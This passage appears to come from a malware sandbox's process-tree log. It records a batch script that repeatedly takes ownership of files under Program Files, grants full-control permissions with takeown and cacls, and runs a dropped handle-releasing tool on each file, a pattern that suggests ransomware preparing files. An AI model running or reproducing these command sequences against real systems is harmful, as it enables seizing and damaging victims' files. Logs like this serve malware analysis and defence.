    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:2580
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "Identity-H" -nobanner
    3⤵
    PID:2416
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "Identity-H" -nobanner
      4⤵
      PID:2316
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1324
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""
  2⤵
  PID:720
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:1328
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"
    3⤵
    - Modifies file permissions
    PID:2956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "MinionPro-Regular.otf" -nobanner
    3⤵
    PID:1996
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "MinionPro-Regular.otf" -nobanner
      4⤵
      PID:2096
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C
    3⤵
    PID:2556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"
    3⤵
    - Modifies file permissions
    PID:2276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "ZY______.PFB" -nobanner
    3⤵
    PID:2980
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "ZY______.PFB" -nobanner
      4⤵
      PID:2756
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2484
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""
  2⤵
  PID:216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C
    3⤵
    PID:524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "brt32.clx" -nobanner
    3⤵
    PID:2500
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "brt32.clx" -nobanner
      4⤵
      PID:2940
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""
  2⤵
  PID:3680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C
    3⤵
    PID:2264
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"
    3⤵
    - Modifies file permissions
    PID:1144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "usa.fca" -nobanner
    3⤵
    PID:3976
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "usa.fca" -nobanner
      4⤵
      PID:3968
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3672
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""
  2⤵
  PID:3712
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:3696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"
    3⤵
    - Modifies file permissions
    PID:2164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "CROATIAN.TXT" -nobanner
    3⤵
    PID:3772
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "CROATIAN.TXT" -nobanner
      4⤵
      PID:2552
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1824
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""
  2⤵
  PID:3596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C
    3⤵
    PID:3836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
    3⤵
    PID:3832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "CP1251.TXT" -nobanner
    3⤵
    PID:3776
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "CP1251.TXT" -nobanner
      4⤵
      PID:3768
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:3860
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:3892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    PID:1828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:3864
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      PID:3720
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:616
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui""
  2⤵
  PID:3056
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2284
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:3932
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:2436
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:2736
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2784
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:1152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3960
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:1100
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:296
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\de-DE\JNTFiltr.dll.mui""
  2⤵
  PID:1220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3132
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\JNTFiltr.dll.mui"
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:2336
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      PID:2640
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3160
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\en-US\Journal.exe.mui""
  2⤵
  PID:3120
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\Journal.exe.mui"
    3⤵
    PID:1728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    PID:4028
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      PID:1564
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2572
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui""
  2⤵
  PID:4032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3084
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui"
    3⤵
    PID:4068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    PID:2280
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      PID:3980
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2348
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\it-IT\jnwmon.dll.mui""
  2⤵
  PID:4048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\jnwmon.dll.mui"
    3⤵
    PID:484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    PID:2684
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      PID:1684
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui""
  2⤵
  PID:2364
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1428
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui"
    3⤵
    PID:2728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:2528
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:3188
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:2604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2608
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:3292
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp""
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp" /E /G Admin:F /C
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp"
    3⤵
    PID:3572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "Month_Calendar.jtp" -nobanner
    3⤵
    PID:3344
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "Month_Calendar.jtp" -nobanner
      4⤵
      PID:1624
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui""
  2⤵
  PID:3184
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3360
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui"
    3⤵
    PID:3472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:3284
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:2828
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  PID:1012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3396
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    PID:4088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3336
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:2508
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3440
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:1812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3532
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:3436
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:3516
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3420
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""
  2⤵
  PID:1592
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C
    3⤵
    PID:3340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"
    3⤵
    - Modifies file permissions
    PID:2792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "distribute_form.gif" -nobanner
    3⤵
    PID:3580
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "distribute_form.gif" -nobanner
      4⤵
      PID:1988
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""
  2⤵
  PID:572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"
    3⤵
    - Modifies file permissions
    PID:1632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "main.css" -nobanner
    3⤵
    PID:1336
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "main.css" -nobanner
      4⤵
      PID:988
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""
  2⤵
  PID:788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"
    3⤵
    PID:2844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "review_shared.gif" -nobanner
    3⤵
    PID:2580
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "review_shared.gif" -nobanner
      4⤵
      PID:3668
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3536
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""
  2⤵
  PID:1760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:1400
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"
    3⤵
    - Modifies file permissions
    PID:2948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:1636
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
      4⤵
      PID:1072
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2456
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""
  2⤵
  PID:1616
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C
    3⤵
    PID:720
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"
    3⤵
    - Modifies file permissions
    PID:1064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
    3⤵
    PID:1944
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
      4⤵
      PID:2556
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2796
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""
  2⤵
  PID:1756
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:2404
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "MyriadPro-Regular.otf" -nobanner
    3⤵
    PID:864
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "MyriadPro-Regular.otf" -nobanner
      4⤵
      PID:932
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:236
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""
  2⤵
  PID:3964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C
    3⤵
    PID:220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"
    3⤵
    PID:2156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
    3⤵
    PID:2264
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
      4⤵
      PID:1144
